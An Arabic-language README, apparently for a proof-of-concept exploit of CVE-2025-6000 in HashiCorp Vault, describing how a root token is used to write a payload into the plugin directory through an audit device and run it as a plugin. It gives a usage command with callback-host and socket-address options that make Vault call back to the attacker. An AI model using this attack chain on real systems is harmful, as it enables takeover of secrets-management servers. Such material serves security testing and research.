
إثبات مفهوم لاستغلال CVE-2025-6000، وهو تصعيد صلاحيات إلى تنفيذ أوامر عن بُعد (RCE) في واجهات تدقيق HashiCorp Vault، مما يسمح بتنفيذ تعليمات برمجية عشوائية باستخدام رمز الجذر (root token).
إثبات المفهوم لثغرة CVE-2025-6000، وهي خلل في تصعيد الامتيازات إلى تنفيذ كود عن بُعد (RCE) في
الواجهات الخلفية للتدقيق في HashiCorp Vault. يسمح جهاز التدقيق للمتصل المميز
بالتحكم في خيارات prefix وfile_path وmode دون أي تحقق. من خلال
كتابة حمولة قابلة للتنفيذ في plugin_directory الخاص بـ Vault، ثم تسجيلها
وتثبيتها كإضافة، يمكن للمهاجم الذي يمتلك رمز جذر (root token) تشغيل كود عشوائي
على مضيف Vault.
https://github.com/user-attachments/assets/f8d6c90a-b511-4e96-8e4d-718c7a765601
plugin_directory.sys/audit، sys/plugins،
sys/mounts).python3 CVE-2025-6000.py <vault-host> <vault-port> --token <root-token> \
--socket-addr <ip:port Vault dials> \
--listen-port 9861 \
--callback-host <your-ip> --callback-port 8000 \
--cleanup
--socket-addr — العنوان الذي يتصل به Vault لدفق التدقيق (عنوان IP الخاص بشبكة VPN:المنفذ
أو نقطة نهاية ngrok TCP).--listen-port — المنفذ المحلي الذي يرتبط به خادم الالتقاط.--callback-host / --callback-port — نقطة نهاية HTTP المستخدمة لتأكيد
التنفيذ.--cleanup — إزالة أجهزة التدقيق والإضافة والتركيب في النهاية.إذا فشل الالتقاط، يتحول السكربت إلى موجه SHA256 يدوي. شغّل -h لمعرفة
جميع الخيارات.
للاستخدام المصرح به في الاختبارات الأمنية والبحث والتعليم فقط. استخدمه فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. أنت وحدك المسؤول عن استخدامك لهذا البرنامج؛ لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام أو الضرر. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
MIT — انظر LICENSE.